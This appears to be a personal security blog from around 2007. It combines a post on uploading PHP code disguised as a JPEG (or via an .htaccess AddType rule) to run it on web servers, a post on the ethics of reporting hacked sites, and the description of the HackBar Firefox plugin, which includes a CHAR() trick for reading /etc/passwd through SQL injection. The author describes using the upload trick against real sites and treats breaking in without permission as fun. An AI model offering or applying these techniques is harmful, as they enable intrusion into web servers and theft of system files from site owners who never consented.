Image uploads are pretty common these days, you get them in most forums, weblogs, community sites etc. There are basicly 2 methods of determining if the uploaded file is an actual image.
1: Check the file extension. This should be gif, jpg or png.
2: Check the file layout, using the PHP getimagesize() function, which is way cooler, cuz it is.
If by chance the developer wasnt paying attention and doesn't check the extension properly, but does use the getimagesize function to determine the image type. You can upload a 'special' file that passes all PHP image checks and still executes the embedded PHP.
Just take a basic jpeg image (yes, your avatar will do) open it in your favorate hex editor, open your php file next to it, and copy-paste the php hex data below the image hex data.
Next, rename the file.jpg to file.php, and try to upload it.
The thing with jpeg is, its not bothered by excess data. The jpeg header takes care of that. A php file just shows its contents, until it finds those cute php tags. So when opening this 'image' in a browser, it will be executed like a normal php file.
I used this image spoof about 20 times now, and it worked about 5 times. So its a long shot, but surely, worth a try.
PS:
if it doesnt work, try to upload a .htaccess file containing: AddType application/x-httpd-php .jpg
and uploading your .php file as a .jpg file. Because of the weird filename layout (.htaccess == no filename and a suspiciously long file extension) some upload checks let it pass through. (older versions of FCKeditor for example)
Tuesday, June 26, 2007
PHP Image uploaders
Security and its ethics
'Cool I hacked some site! I must now tell the owner (whoever that may be) how he should fix his bogus security.. and of course, what a 1337 H@xor I am!'..
When I find SQL injections, most of the time i don't even bother telling the owner of the site, unless of course, its something big and important, and lives are (or my money is) at stake. Most of the time you get a lame reply or none at all.. and this made me think.
Finding security leaks is fun for me, its a challenge. When I'm actually IN, I lose interest real fast. The rush you get, when you get closer and closer, is the best there is! The thing is.. telling the owner you were in his backend, proving it with pretty screenshots is roughly equivalent to forcing your way into his living room and sending him a postcard afterwards (with you in it.. on his couch.. watching his p0rn) . What more can we expect but a pale faced: "Thank you for not telling anyone.."?
This is different for the bigger companies. They have the beauty of bureaucracy! This is just a fancy word for: "Hi Boss, I didn't do it, it was that guy over there.. oh wait.. he quit a few weeks ago.. you want me to fix it? I'd be happy to!"
This is even more different for the really big companies with a security team on top. They tend to sue you to death, or if they are really impressed, hire you! (probably worse)
Just picture yourself in a bank vault, explaining your 'bendy paperclip technique' that allowed you to open the door while disabling any surrounding camera's or alarms.. pure horror!
So.. its better to not say anything.. is it? Well no.. the best thing i can think of is, just be real careful when you do tell. Don't try to be the all knowing hacker that saved them from a pity full doom. Just tell them what you do, why you do it, and... what you did :)
Or even better, contact them in advance, ask them if its ok. I did it a few times, it works great. The only problem is that this approach kind of kills the ninja feeling of it all.. but thats just me i guess.
Hackbar 1.1.1
I have released the new version of the HackBar firefox plugin. Well.. not exactly.. i released it a month ago, but it should be on this blog, so here it is.
>> So... why the lame name?
<< Well.. it started out as a joke. I wanted to write a firefox plugin, and i was fed up with the confusing and unreadable url when performing SQL injections. So a lame textarea toolbar was born. I decided to call it HackBar.. cuz, thats what it helps you do.. doesn't it? After a while i saw the error of my way. The first problem was getting it through the firefox plugin people. That took about a month.. And now, its not just my toy, its anyones toy.. And apparently its my problem that its not available in chinese.. or some other language i cant read.
Anyway, heres the link: https://addons.mozilla.org/en-US/firefox/addon/3899
Hackbar 1.1.1 description
# New features
- Show / Hide hotkey [F9]
- Tab sensitive
- Auto load, split and focus when pressing hotkey on a new URL.
- Localized ( English and dutch for now )
- Textarea width set to 100% (removed dragbar)
- Complete code revision (OO based instead of functions)
# In general
This toolbar will help you in testing sql injections, XSS holes and site security. It is NOT a tool for executing standard exploits and it will NOT learn you how to hack a site. Its main purpose is to help a developer do security audits on his code. If you know what your doing, this toolbar will help you do it faster. If you want to learn to find security holes, you can also use this toolbar, but you will probably also need a book, and a lot of google :)
# The advantages are:
- Even the most complicated urls will be readable
- The focus will stay on the textarea, so after executing the url (ctrl+enter) you can just go on typing / testing
- The url in textarea is not affected by redirects.
- I tend to use it as a notepad :)
- Usefull tools like on the fly uu/url decoding etc.
- All functions work on the currently selected text.
# Load url ( alt a )
This loads the url of the current page into the textarea.
# Split url ( alt s )
When this button is clicked, the url/text in the textarea will be split into multiple lines using the ? and & character
# Execute ( alt x, ctrl enter )
This will execute the current url in the textarea, i mostly use ctrl+enter
# INT -1 ( alt - )
First select a number in the textarea and press this button, the number will be lowered by 1 and the url will be loaded.
# INT +1 ( alt + )
Again first select a number in the textarea and press this button, 1 will be added to the number and the url will be loaded.
# MD5 Hash ( alt m )
this is a standard hashing method, often used as an encryption method for passwords. It will MD5 hash the currently selected string.
# MySQL CHAR() ( alt y )
If quotes are escaped but you did find an SQL injection thats exploitable, you can use this button to convert lets say:
load_file('/etc/passwd') --> load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100))
Thus omiting the use of quotes to load a file.
You can also use this on
WHERE foo LIKE ('%bar%') --> WHERE foo LIKE (CHAR(37, 98, 97, 114, 37))
# MsSQL CHAR() ( alt q )
Same story as MySQL CHAR(), MsSQL has a slightly different CHAR syntax
--> WHERE foo LIKE ( CHAR(37) + CHAR(98) + CHAR(97) + CHAR(114) + CHAR(37))
# Base64 encode / decode
Base64 encoding ( UU ) is often used to store data (like a return url etc.) This will help you to read those values.
# URLencode / decode
This will encode or decode the currently selected characters to url safe characters. I mostly use it to end a query with # (%23) when in a pseudo path where i cant use /* or --
Cool! another blog full of crap... about stuff!
Yep.. you're so right!
I'm a PHP developer, I'm interested in lots of things, mostly web development and i needed an outlet. So here we are.
Security is something I like to play with, it's nice out-of-the-box thinking. A fitting description would be "a jigsaw puzzle without the pretty picture.." But that would just be plain silly.
Next to that i tend to release some scripts and applications onto the word...
So now you know.. bare with me :)